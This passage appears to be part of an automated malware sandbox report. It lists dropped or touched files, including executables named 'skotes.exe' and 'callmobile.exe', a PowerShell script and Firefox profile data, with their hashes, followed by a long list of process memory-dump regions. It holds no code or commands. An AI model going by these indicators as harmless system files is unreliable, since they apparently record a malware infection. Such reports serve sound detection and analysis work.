                  • C:\Users\Admin\AppData\Local\Temp\1013248041\KeaEfrP.ps1
                      Filesize  2KB
                      MD5       62e668d5993865a150073479bdc42ec5
                      SHA1      b2b4e7767c5b0c9218127401c8d8b8723148ffc7
                      SHA256    ea4b7480d291e1e3ec6029bc92c3c732d005ad215518e8c483388b8227f4dd52
                      SHA512    6ba4fe44398b89a82804013151a73f4aa00be9468d76cf2b40fe7a410c4d646c84ab10f2561fed694ee0b3a24bd50f46a75427097996be171a83f671196b0cbc

                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\callmobile.exe
                      Filesize  2.3MB
                      MD5       ffabcc262fb699998b6191d7656c8805
                      SHA1      fd3ea79a8550b14e9cc75fb831fd7a141964a714
                      SHA256    f46e4a7de978baceec5f64cbc9fa1f1e772e864fa3310045cd19d77264698cde
                      SHA512    79b2e21a9111b16b0f67ae5d1cc40a25773b847d3f4cf78711a8dfd8b67c30beec332ed65ac008c9dca62c84de891eff20d7c6050bc868bce77a17fe56da61ba

                  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                      Filesize  3.1MB
                      MD5       2b3dca9f3f8f7b379021a041b731aed3
                      SHA1      e8fc7d977c0a76e25b1e69f4398a10fef83918d0
                      SHA256    ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24
                      SHA512    ce65473353253347788ed1d0641a6c6a3be815c50bd1046c1aa8bf827f48c0f09b61560f3aa3eeb8f641afa6d7a870dd68834615b3fe81b6f62a9ffee946f98a

                  • C:\Users\Admin\AppData\Local\Temp\tmpaddon
                      Filesize  442KB
                      MD5       85430baed3398695717b0263807cf97c
                      SHA1      fffbee923cea216f50fce5d54219a188a5100f41
                      SHA256    a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
                      SHA512    06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

                  • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
                      Filesize  8.0MB
                      MD5       a01c5ecd6108350ae23d2cddf0e77c17
                      SHA1      c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
                      SHA256    345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
                      SHA512    b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\db\data.safe.bin
                      Filesize  2KB
                      MD5       ba0763d4f96d8dab974f8ae6f1e937b2
                      SHA1      5cfc302c4f569507beae68775d6c6bd25e4999cf
                      SHA256    a32ddd799482a64ec2c05fe9536a980890d3a7144b5acc64fa512551d16f700b
                      SHA512    daa4e149e691372c5990579d4911547035f368205ea735eb51a98748d4bd57b774ac689cddc7ff1526aeae6fdf4f5958ba99d8de5bd5a910064a611229d6919f

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\pending_pings\80e7919d-90e5-47ca-8444-778326d8aa30
                      Filesize  745B
                      MD5       97df97229d034ec347463058d48aea7d
                      SHA1      6e1490a40efb7baa1932ebe64e3cd5dc45250403
                      SHA256    1b41c2c3b1dea23e3da0c61c2f8a49fa74945739df331ce976257912694bf7a8
                      SHA512    0f9d9bca31ffe20906cfc914d2f644605f13ff59a74a61242df500f5020565aa925c977ace906f5c8889b1e70eb577677260440e27c807355e024d0734f79d04

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\pending_pings\99fc8ab0-685a-495b-be6e-61f5d8135853
                      Filesize  12KB
                      MD5       176da93def6bdfc1332c9f2523556d13
                      SHA1      da5097160a71ccd1753985e2f5643eedb88c32e0
                      SHA256    fb6c77b7b00e54444a8154639912c4ec23d0423342046c7d79cd475eb6e9c0cd
                      SHA512    c0774dbd57af5e8214e3afbb0c1439b39c989f46f125bc809989e143e2fd9bd996bb394d3d960527216796cf0dc1ac21172a4117fe8c5fae35d70603615be9c2

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
                      Filesize  997KB
                      MD5       fe3355639648c417e8307c6d051e3e37
                      SHA1      f54602d4b4778da21bc97c7238fc66aa68c8ee34
                      SHA256    1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
                      SHA512    8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
                      Filesize  116B
                      MD5       3d33cdc0b3d281e67dd52e14435dd04f
                      SHA1      4db88689282fd4f9e9e6ab95fcbb23df6e6485db
                      SHA256    f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
                      SHA512    a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
                      Filesize  479B
                      MD5       49ddb419d96dceb9069018535fb2e2fc
                      SHA1      62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
                      SHA256    2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
                      SHA512    48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
                      Filesize  372B
                      MD5       8be33af717bb1b67fbd61c3f4b807e9e
                      SHA1      7cf17656d174d951957ff36810e874a134dd49e0
                      SHA256    e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
                      SHA512    6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
                      Filesize  11.8MB
                      MD5       33bf7b0439480effb9fb212efce87b13
                      SHA1      cee50f2745edc6dc291887b6075ca64d716f495a
                      SHA256    8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
                      SHA512    d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
                      Filesize  1KB
                      MD5       688bed3676d2104e7f17ae1cd2c59404
                      SHA1      952b2cdf783ac72fcb98338723e9afd38d47ad8e
                      SHA256    33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
                      SHA512    7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
                      Filesize  1KB
                      MD5       937326fead5fd401f6cca9118bd9ade9
                      SHA1      4526a57d4ae14ed29b37632c72aef3c408189d91
                      SHA256    68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
                      SHA512    b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs-1.js
                      Filesize  6KB
                      MD5       6f20b1d9657531a9fbb7a77d37936199
                      SHA1      ce4b0eb42cc6cc2bbe5eb334bebc75c5685cffbc
                      SHA256    2b9dd2283e93a62029e43ee8f930e6c5d10641dc877206f97ebe2ab9038fba3e
                      SHA512    4ef551071639b5190a41009d1224da7be7f71aef50fa901d1d4b825eca156308a8eaaa839fb5329873f3ca0739099cce95800919af2f508da5fdc4f1f0b104ab

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs-1.js
                      Filesize  7KB
                      MD5       d3a62a77031e86ac8bf2320330305c05
                      SHA1      acc89b0adc68779f2ce8c0357d385396a2be49ec
                      SHA256    0930914de46e93424525e2bdb430a21e67452a9aeccbbfb5b560a638edca3ca5
                      SHA512    af2e47f480b9e74c5d7e53fe1f2264fd5a2b83fd974343ef96d1541294bb72dba98d12820be1fc6c742243e5b3602558dcc16604dd9d801a2877aaf4131fa0f6

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs.js
                      Filesize  6KB
                      MD5       14702774e53c64d7bfee5dc67ca24b2f
                      SHA1      31d2c9a0717a4747dbdc88da9421350781ede382
                      SHA256    fd156a3827d5463a093aa11b95f26269a356eb79e0006d26dc67d78b6336d0ca
                      SHA512    c76ff3d79d9271b10c516cf1fc5ffeae7bb0fafc0280dab123174f6341f9f68a4e72550b8872fe6a4ba54735521880383ad1cef886c619ba666cd5f0cfcec38b

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\sessionstore-backups\recovery.jsonlz4
                      Filesize  4KB
                      MD5       2d51833052dc89054327529a2ea36023

                    SHA1

                    b0c06356af6cf9ce1f85577504c34e515d0f1abd

                    SHA256

                    dcc511bf10f44c31bee2d60abf52945933b1fe88391ec7cf90ba0789a4f57e8a

                    SHA512

                    b6b4895e35111911492210fb332b0b67f5155a09750346bae2021958ca135625070475cf5ac528f0ddb50d90cef0d17adac0a2ef980998b4fb7e7d665324c196

                  • memory/684-2646-0x00000000009B0000-0x0000000000C74000-memory.dmp

                    Filesize

                    2.8MB

                  • memory/684-2650-0x00000000009B0000-0x0000000000C74000-memory.dmp

                    Filesize

                    2.8MB

                  • memory/684-2652-0x00000000009B0000-0x0000000000C74000-memory.dmp

                    Filesize

                    2.8MB

                  • memory/684-2720-0x00000000009B0000-0x0000000000C74000-memory.dmp

                    Filesize

                    2.8MB

                  • memory/684-2729-0x00000000009B0000-0x0000000000C74000-memory.dmp

                    Filesize

                    2.8MB

                  • memory/904-68-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-56-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-96-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-94-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-92-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-90-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-112-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-110-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-108-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-86-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-84-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-76-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-74-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-73-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-62-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-60-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-58-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-82-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-80-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-78-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-66-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-55-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-1232-0x00000000022D0000-0x000000000231C000-memory.dmp

                    Filesize

                    304KB

                  • memory/904-1231-0x0000000005510000-0x000000000567E000-memory.dmp

                    Filesize

                    1.4MB

                  • memory/904-100-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-88-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-2712-0x00000000023F0000-0x0000000002444000-memory.dmp

                    Filesize

                    336KB

                  • memory/904-102-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-64-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-104-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-52-0x00000000002E0000-0x000000000053E000-memory.dmp

                    Filesize

                    2.4MB

                  • memory/904-98-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-70-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-106-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-53-0x0000000004F40000-0x000000000513E000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/1152-2481-0x00000000001A0000-0x0000000000648000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/1152-2478-0x00000000001A0000-0x0000000000648000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/1592-1287-0x0000000000EF0000-0x000000000114E000-memory.dmp

                    Filesize

                    2.4MB

                  • memory/1592-2816-0x0000000000CD0000-0x0000000000D24000-memory.dmp

                    Filesize

                    336KB

                  • memory/2756-2497-0x00000000067F0000-0x0000000006E7B000-memory.dmp

                    Filesize

                    6.5MB

                  • memory/2756-22-0x0000000000FB1000-0x0000000001019000-memory.dmp

                    Filesize

                    416KB

                  • memory/2756-1244-0x00000000067F0000-0x0000000006C9C000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/2756-20-0x0000000000FB0000-0x00000000012C4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/2756-54-0x0000000000FB0000-0x00000000012C4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/2756-2498-0x00000000067F0000-0x0000000006E7B000-memory.dmp

                    Filesize

                    6.5MB

                  • memory/2756-2643-0x00000000067F0000-0x0000000006E7B000-memory.dmp

                    Filesize

                    6.5MB

                  • memory/2756-2474-0x00000000067F0000-0x0000000006C98000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/2756-33-0x0000000000FB0000-0x00000000012C4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/2756-2645-0x00000000062F0000-0x00000000065B4000-memory.dmp

                    Filesize

                    2.8MB

                  • memory/2756-2644-0x00000000062F0000-0x00000000065B4000-memory.dmp

                    Filesize

                    2.8MB

                  • memory/2756-32-0x0000000000FB0000-0x00000000012C4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/2756-31-0x0000000000FB0000-0x00000000012C4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/2756-29-0x0000000000FB0000-0x00000000012C4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/2756-28-0x0000000000FB1000-0x0000000001019000-memory.dmp

                    Filesize

                    416KB

                  • memory/2756-23-0x0000000000FB0000-0x00000000012C4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/2756-2718-0x00000000062F0000-0x00000000065B4000-memory.dmp

                    Filesize

                    2.8MB

                  • memory/2756-2719-0x00000000062F0000-0x00000000065B4000-memory.dmp

                    Filesize

                    2.8MB

                  • memory/2756-27-0x0000000000FB0000-0x00000000012C4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/2756-26-0x0000000000FB0000-0x00000000012C4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/2756-25-0x0000000000FB0000-0x00000000012C4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/3064-21-0x0000000000931000-0x0000000000999000-memory.dmp

                    Filesize

                    416KB

                  • memory/3064-18-0x00000000066D0000-0x00000000069E4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/3064-17-0x0000000000930000-0x0000000000C44000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/3064-5-0x0000000000930000-0x0000000000C44000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/3064-3-0x0000000000930000-0x0000000000C44000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/3064-2-0x0000000000931000-0x0000000000999000-memory.dmp

                    Filesize

                    416KB

                  • memory/3064-1-0x0000000077160000-0x0000000077162000-memory.dmp

                    Filesize

                    8KB

                  • memory/3064-0-0x0000000000930000-0x0000000000C44000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/3396-2502-0x0000000000B80000-0x000000000120B000-memory.dmp

                    Filesize

                    6.5MB

                  • memory/3396-2500-0x0000000000B80000-0x000000000120B000-memory.dmp

                    Filesize

                    6.5MB

                  • memory/4900-1250-0x0000000000940000-0x0000000000DEC000-memory.dmp

                    Filesize

                    4.7MB
